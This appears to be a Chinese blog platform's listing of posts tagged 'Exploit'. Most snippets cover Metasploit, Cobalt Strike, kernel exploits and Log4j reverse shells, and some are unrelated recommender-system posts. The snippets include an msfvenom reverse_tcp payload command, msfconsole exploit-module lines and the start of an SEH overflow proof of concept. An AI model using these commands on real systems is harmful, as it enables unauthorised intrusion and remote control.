Exploit

攻防基础工具系列 Post Exploitation工具 Cobalt Strike

本篇文章将介绍CobaltStrike的基础用法,这里面会给出一个完整的例子,来讲解如何使用CobaltStrike完成一次完整的内网渗透前置条件假设我们通过钓鱼邮件,控制了域内一台普通员工机器。接下来,我们如何进行横向移动呢?image-20200131150530973.png进入命令行image-20200131151142788.png点击interact,进入命令行界面image-202
墨攻科技·2022-02-10 14:32

python漏洞扫描模块_btscan: btScan 是一个 Python 开发的批量漏洞扫描验证和利用框架...

crawl通过空间搜索引擎抓取url或者ip的脚本使用方法pythonbtScan.pyusage:btScan.py[options]*batchvulnerabilityverificationandexploitionframework
weixin_39763293·2022-02-10 09:49

6.msf实验

反向连接:1.执行searchms10-018命令,搜索路径2.执行useexploit/
皮蛋是个臭蛋·2022-02-10 02:48

[Android Root] CVE-2017-7533 漏洞分析和复现

此外,进一步思考如果想要从poc到exploit进一步需要做哪些事情?
看雪学院·2022-02-07 16:11

樊登读书会践行笔记Day2赋能:打造应对不确定性的敏捷团队

3F代表的是Find(找到)、Fix(锁定)、Finish(终结),E代表的是Exploit(利用),A代表的是Analyze(分析)。这与著名的OODA流程类似:Observe
星空的小天地·2022-02-06 11:19

Exp5 MSF基础应用

实验前的了解:MSF的六种模块Exploit模块是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件。
起笔不忘你·2022-02-06 09:34

Types of Generalization,Can Memorization Generalize?

由wide&deep文中定义:Memorizationcanbelooselydefinedaslearningthefrequentco-occurrenceofitemsorfeaturesandexploitingthecorrelationavailableinthehistoricaldata.Generalization
shudaxu·2022-01-13 17:15

joomla 3.4.6 RCE漏洞复现及简要分析

0x00前些日子,例行每天打开各大论坛,exploit-db进行遨游,发现了都在写joomla3.4.6的RCE漏洞,也有说他是反序列漏洞。
Nophone·2021-12-31 16:05

Log4j反弹shell

服务器到期的最后几个小时先操作一波~image.png一:准备环境:1:expjar包JNDI-Injection-Exploit2:利用dnslog平台做初步验证随意哪个都可以ceye.iodnslog.linkdnslog.cndnslog.iotu4
表弟_212·2021-12-13 11:16

msfvenom生成后台木马监听目标(windows渗透测试)

针对windows操作系统的渗透测试操作过程概况:利用msf生成一个后台木马,使用exploit/multi/handler模块,通过对方打开的形式获取权限,可以进入后渗透对目标进行监听等操作。
陈拾壹灬·2021-12-06 10:48

Windows xp Ms08067漏洞复现

usr/share/nmap/scriptsnmap--script=vuln192.168.XXX.XXX扫描后有漏洞ms08067用mts进行攻击先找漏洞利用:search08_067运用漏洞:useexploit
hint=flag·2021-11-18 20:12

强化学习笔记:多臂老虎机问题

目录1.前言2.多臂老虎机问题描述3.Conlictbetweenexploitationandexploring4.Action-Valuemethod,行动-价值方法5.仿真1.前言强化学习与其它类型的学习的最重要的差异之一是它所利用的训练信息为评价性反馈信息
笨牛慢耕·2021-11-18 11:00

ApacheCN 网络安全译文集 20211025 更新

应用的逆向和审计第四章对Android设备进行流量分析第五章Android取证第六章玩转SQLite第七章不太知名的Android漏洞第八章ARM利用第九章编写渗透测试报告SploitFunLinuxx86Exploit
·2021-10-26 22:48

GT CS 6262 网络安全

AdvancedWebSecurityFall2021ThelatestChromebrowserishighlyrecommendedforthisprojectObjectivesAttackawebapplicationbyexploitingitsXSSvulnerabilitiestoinfectitsusersasper
·2021-10-19 09:07

【kernel exploit】CVE-2017-6074 DCCP拥塞控制协议Double-Free提权分析

测试版本:Linux-v4.9.12exploit及测试环境下载地址—https://github.com/bsauce/kernel-
bsauce·2021-10-18 09:14

“入侵5G手机”Black Hat USA 2021:通过无线基带-针对5G智能手机的RCE远程代码执行攻击白皮书

OverTheAirBasebandExploit:GainingRemoteCodeExecutionon5GSmartphones通过无线基带-针对5G智能手机的RCE远程代码执行攻击白皮书致谢:腾讯科恩安全实验室
鸿渐之翼·2021-10-17 15:28

常见漏洞发布平台

【常用】http://www.exploit-db.com[比较及时]http://www.securityfocus.com(国际权威漏洞库)http://www.cnvd.org.cn/(国家信息安全漏洞共享平台
欧晨eli·2021-09-29 16:10

Metasploit用法详解

2.Exploit(漏洞利用模块)漏洞利用是指由渗透测试者利用一个系统、应用或者服务中的安全漏洞进行的攻击行为。
1_Ry·2021-09-05 15:00

新手入门二进制安全和网络渗透,该选哪个比较好?

一般来说,二进制安全方向,主要是做逆向分析、漏洞挖掘与Exploit、内核安全、破解等工作。网络渗透主要是Web安全、内网渗透、漏洞扫描与利用、安全审计、日志分析等工作。简单来说,二进制方向
·2021-08-26 19:27

近期 0day exploit 满天飞,原来是神秘的以色列公司 Candiru 在捣鬼

编译:奇安信代码卫士今天,微软和加拿大多伦多大学公民实验室联合发布报告指出,以色列公司Candiru是Windows两个0day及其它0dayexploit的幕后黑手。
奇安信代码卫士·2021-07-16 17:31

MSF

相关命令登入控制台root@kali:~#msfconsole搜索模块searchms08-067打开模块useexploit/windows/smb/ms08_067_netapi查看相关信息exploit
撸代码的老师傅·2021-06-26 22:53

Word Power Made Easy 英语说文解字 Day 5

臭名昭著的骗子widelybutunfavorablyknownnotorietyn.恶名notus=出名的knownnoted著名的notedindustrialist知名的企业家notoriousexploiter
柳树发芽·2021-06-26 10:40

利用msf抓取密码,并用hash登录

msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.3.136LPORT=12345-fexe>/root/test.exe2、反弹到kali启动msfuseexploit
BuFFERer·2021-06-25 11:16

Msf攻击案例

msf之ms10-087输入命令searchms10-087;使用这个模块:Useexploit/windows/fileformat/ms10_087_rtf_pfragments_bofimage.png
JyinP·2021-06-23 20:08

CVE-2019-13272 Linux本地提权漏洞复现

5.1.17测试主机信息:Linuxubuntu4.15.0-30-generic#32-UbuntuSMPThuJul2617:42:43UTC2018x86_64x86_64x86_64GNU/LinuxExploit
Cyc1e·2021-06-19 06:02

MSF 简单使用

msf>useexploit/windows/smb/cve_2017_8464_lnk_rcemsfexploit(cve_2017_8464_lnk_rce)>setpayloadwindows/x64
rmrfany·2021-06-15 07:02

heap exploit总结

第二次学习heapexploit,虽说走了弯路,第一次一知半解,知道为啥会走弯路,也是有价值的。相关资料总结:1。
clive0x·2021-06-13 23:10

【kernel exploit】BPF漏洞挖掘与CVE-2020-27194 整数溢出漏洞

影响版本:5.8.x内核分支,v5.8.15以及更低的版本。该分支的发行版:Fedora33、Ubuntu20.10。编译选项:CONFIG_BPF_SYSCALL。漏洞描述:eBPF验证程序中进行or操作时,scalar32_min_max_or()函数将64位的值赋值到32位的变量上,导致整数截断,进而错误计算了寄存器的范围,从而绕过bpf的检查,导致越界读写。补丁:patchscalar32
bsauce·2021-06-13 08:34

Drozer-Android安全测试

drozer可以帮助App和设备变得更安全,其提供了很多Android平台下的渗透测试exploit供你使用和分享。对于远程的exploit,它可以生成shellcode帮助你进行远程设备管理。
简简的我·2021-06-13 06:15

7M推荐系统 - S1 推荐系统和常用算法

->用户行为->关注和付费电商:浏览深度->用户行为->付费分层流量占比销量大于10000的占比多少9000到10000的占比多少多样性新颖性惊喜性推荐内物品不一样,推没见过的关注,与历史偏好不太一样Exploitation
左心Chris·2021-06-10 07:19

【kernel exploit】CVE-2021-31440 eBPF边界计算错误漏洞(Pwn2Own 2021)

测试版本:Linux-5.11exploit及测试环境下载地址—https://github.com/bsauce/kernel_exploit_factory编译选项:CONFIG_BPF_SYSCALL
bsauce·2021-06-09 14:50

推荐系统

推荐系统Overview6、什么是推荐系统7、Exploit&Explore问题8、推荐系统的评价指标有哪些9、如果让你推导推荐系统的架构,你会如何设计10、为什么有些方法在工作中会不work推荐系统推荐系统是一种信息过滤系统
Sara_d94e·2021-06-08 02:34

How I Used a JSON Deserialization Oday to Steal Your Money on the Blockchain

TencentSecurityXuanwuLabZekaiWu|SecurityResearcher,TencentSecurityXuanwuLabFormat:40-MinuteBriefingsTracks:ExploitDevelo
菠萝科技·2021-05-29 07:33

【bsauce读论文】2021-USENIX-EXPRACE-采用中断机制来利用多变量竞争漏洞

本文提出的技术最开始在2020BlackHat上展示,名字叫ExploitingKernelRacesThroughTamingThreadInterleaving,今年又在2021USENIX会议上发表出来
bsauce·2021-05-26 21:53

忠告 & 基础

专业术语介绍渗透攻击(Exploit)渗透攻击是指由攻击者或渗透测试者利用一个系统、应用服务中的安全漏洞,所进行的攻击行为。攻击者使用渗透攻击去入侵系统时,往往会
椋鸟·2021-05-16 18:43

How to Exploit the Internet to Our Advantage

ItisuniversallyacknowledgedthatInternethasbecomeanecessaryandusefultoolineveryone’sdailylife.worldTakeanexampleofmine,throughInternet,Icaneasilyknowtomorrow’sweatherandpreparetheclotheswithoutinahurry
热A爱·2021-05-16 18:25

2018-04-02

newTraffickingofchildren(aka"ChildLabor"and"ChildExploitation)isaformofhumantraffickingandisdefinedasthe"recruitment
_______h·2021-05-09 13:58

逼格高的纯英文编程技术周刊《Guru Weekly》第1期

业界新闻RemotelyExploitableJavaZeroDayExploitsthroughDeserializationRedHatLinuxEnterpriseisReferencePlatformfor.NETCoreonLinuxLinuxRansomwaretargetingS
推酷·2021-05-09 07:32

kali下CVE_2017_7442利用实验

参考:https://www.exploit-db.com/exploits/42418/https://www.youtube.com/watch?
一点也不想吃辣·2021-05-08 18:10

二进制安全:转化大师漏洞复现:Boxoft Convert Master 1.3.0 - ‘wav‘ SEH Local Exploit

此次渗透测试针对软件转换大师BoxoftConvertMaster‘wav’SEH本地攻击实验平台:windows7poc由Achilles提供exp:importstructbuffer="\x41"*4132nseh="\xeb\x06\x90\x90"#jmpshort6seh=struct.pack('
鸿渐之翼·2021-05-04 20:10

003 内容推荐:探索与信息茧房

信息茧房信息茧房其实关联了推荐领域的一个经典问题:Exploitation(利用已有兴趣推荐)和Exploration(探索新的兴趣)。推荐系统势必要在E&E之间取平衡和折衷。
闫泽华·2021-05-04 17:47

渗透测试***漏洞检测工具命令行工具

blog.csdn.net/Jiajiajiang_/article/details/80742955MicrosoftWindows-'HTTP.sys'(PoC)(MS15-034)网站参考:https://www.exploit-db.com
幼姿沫·2021-05-04 15:50

2016年4月25,26日(乌托邦)

눈_눈Stellaris是瑞典工作室Paradox旗下又一4XRTS(eXplore,eXpand,eXploit,andeXterminateRealTimeStrategy),杉果有售今天想要继续谈谈
上海王尔德·2021-05-01 22:28

Linux (x86) Exploit 开发系列教程之八 绕过 ASLR -- 第三部分

绕过ASLR--第三部分译者:飞龙原文:BypassingASLR–PartIII预备条件:经典的基于栈的溢出绕过ASLR--第一部分VM配置:Ubuntu12.04(x86)在这篇文章中,让我们看看如何使用GOT覆盖和解引用技巧。来绕过共享库地址随机化。我们在第一部分中提到过,即使可执行文件没有所需的PLT桩代码,攻击者也可以使用GOT覆盖和解引用技巧来绕过ASLR。漏洞代码://vuln.c#
布客飞龙·2021-05-01 17:08

第七章 高级利用

7.1在Exploit-DB中搜索Web服务器的漏洞我们偶尔会在操作系统中,Web应用所使用的库中,以及
三月行者·2021-04-27 11:47

《推荐系统》读书笔记

推荐系统学习笔记第一章节概念与思维什么时候需要用有推荐系统推荐系统常见的问题模式(主要做什么的)1.预测问题模式评分预测行为预测2常见难题冷启动问题EE问题:探索和利用问题(explorationandexploitation
阿汪阿喵酱·2021-04-24 21:08

iOS逆向与防护相关资料

IOS安全学习网站收集:http://samdmarshall.comhttps://www.exploit-db.comhttps://reverse.put.ashttp://security.ios-wiki.comhttps
NBeanN·2021-04-21 19:34

Metasploit渗透测试(双脉冲星)

而且要保证两台机器之间可以ping通因为kali里面没有这个rb源代码所以我们要把这个模块导入进去我们先要smb模块下载到这里面#cd/usr/share/metasploit-framework/modules/exploits
落寞的鱼丶·2021-04-21 18:31

使用msf渗透安卓系统

然后打开msfconsolemsf>useexploit
二潘·2021-04-20 15:06

记一次比较蛋疼的渗透(getshell)

老规矩,对于这种已知CMS我都是先谷歌一下、或者是ExploitDB找一下有没有可以利用的漏洞EXP。ExploitDB结果谷歌结果经过搜索好像是有一个任意文件上传,但是利用EXP一把梭的时候
Nophone·2021-04-19 16:08
上一页 8 9 10 11 12 13 14 15 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他